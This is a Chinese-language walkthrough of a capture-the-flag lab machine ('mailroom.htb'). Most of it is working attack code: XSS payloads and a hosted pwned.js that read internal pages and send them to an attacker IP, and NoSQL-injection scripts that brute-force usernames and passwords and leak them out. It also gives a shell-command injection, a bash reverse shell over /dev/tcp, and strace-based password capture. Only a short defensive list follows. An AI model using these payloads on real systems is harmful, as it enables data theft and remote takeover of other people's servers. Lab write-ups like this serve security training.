渗透测试 | 一次利用XSS读取源码
字数 865 2025-08-11 00:55:07
XSS漏洞利用与渗透测试实战教学文档
1. 信息收集阶段
1.1 初始扫描
使用nmap进行全端口扫描:
nmap -p- --min-rate=1000 -T4 -sC -sV -Pn 10.10.11.209
1.2 子域名发现
- 常规目录扫描无果后发现存在子域名
- 通过查看网页源码发现隐藏子域名
- 重点子域名:
staff-review-panel.mailroom.htb
2. XSS漏洞利用
2.1 基础XSS验证
<script>alert('xss')</script>
2.2 进阶利用:XMLHttpRequest发起内网请求
<script>
var fetch_req = new XMLHttpRequest();
fetch_req.onreadystatechange = function() {
if(fetch_req.readyState == XMLHttpRequest.DONE) {
var exfil_req = new XMLHttpRequest();
exfil_req.open("POST", "http://10.10.16.5", false);
exfil_req.send("Resp Code: " + fetch_req.status + "\nPage Source:\n" + fetch_req.response);
}
};
fetch_req.open("GET", "http://127.0.0.1//contact.php", false);
fetch_req.send();
</script>
2.3 外部JS文件加载
创建pwned.js:
var http = new XMLHttpRequest();
http.open('GET', "http://staff-review-panel.mailroom.htb/index.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
fetch("http://10.10.16.5/out?" + encodeURI(btoa(this.responseText)));
};
http.send(null);
Burp Suite请求示例:
POST /contact.php HTTP/1.1
Host: mailroom.htb
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
email=1%401.com&title=1&message=<script src="http://10.10.16.5/pwned.js"></script>
3. 代码审计与漏洞分析
3.1 auth.php关键漏洞
- MongoDB NoSQL注入漏洞
- 2FA令牌生成与验证逻辑
3.2 inspect.php命令注入
$inquiryId = preg_replace($_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
4. NoSQL注入攻击
4.1 基础绕过认证
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
fetch("http://10.10.16.5/out?" + encodeURI(btoa(this.responseText)));
};
http.send("email[$ne]=someb0dy@sm.com&password[$ne]=someb0dy");
4.2 用户名爆破脚本
async function callAuth(mail) {
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
if (/"success":true/.test(this.responseText)) {
notify(mail);
cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!", mail);
}
};
http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
fetch("http://10.10.16.5/out?" + mail);
}
var chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!";
function cal(chars, mail) {
for (var i = 0; i < chars.length; i++) {
callAuth(chars[i] + mail)
}
}
cal(chars, "");
4.3 密码爆破脚本
async function callAuth(pass) {
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
if (/"success":true/.test(this.responseText)) {
notify(pass);
cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!", pass);
}
};
http.send("email=tristan@mailroom.htb&password[$regex]=^"+pass);
}
function notify(pass) {
fetch("http://10.10.16.5/out?" + pass);
}
var chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!";
function cal(chars, pass) {
for (var i = 0; i < chars.length; i++) {
callAuth(pass+chars[i])
}
}
cal(chars, "");
5. 权限提升技术
5.1 2FA验证绕过
- 通过本地文件发现2FA验证链接
/etc/mail/tristan文件中包含验证链接
5.2 命令注入实现RCE
创建反弹shell脚本:
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.5/5555 0>&1
5.3 kdbx文件解密
- 发现
personal.kdbx文件 - 使用
kpcli工具打开 - 通过strace获取密码输入:
strace -p [PID] -e trace=read
获取到的密码:`!sEcUr3p4
\[w0rd9` ## 6. 漏洞根源分析 ### 6.1 XSS漏洞成因 - 用户输入`message`参数未经过滤直接输出到页面 - 前端模板`inquiry_template.html`直接渲染用户输入 ### 6.2 完整渗透流程总结 1. 信息收集发现子域名 2. 通过XSS读取源码 3. 代码审计发现NoSQL注入点 4. 利用NoSQL注入获取SSH凭证 5. 绕过2FA验证 6. 通过命令注入获取RCE 7. 寻找敏感信息获取第二个用户凭证 8. 解密kdbx文件 9. 最终获取root权限 ## 7. 防御建议 1. 对所有用户输入进行严格过滤和转义 2. 实施内容安全策略(CSP)防止XSS 3. 使用参数化查询防止NoSQL注入 4. 避免直接使用用户输入拼接系统命令 5. 加强2FA验证机制,避免本地文件泄露验证链接 6. 敏感文件加密存储,避免明文存储密码\]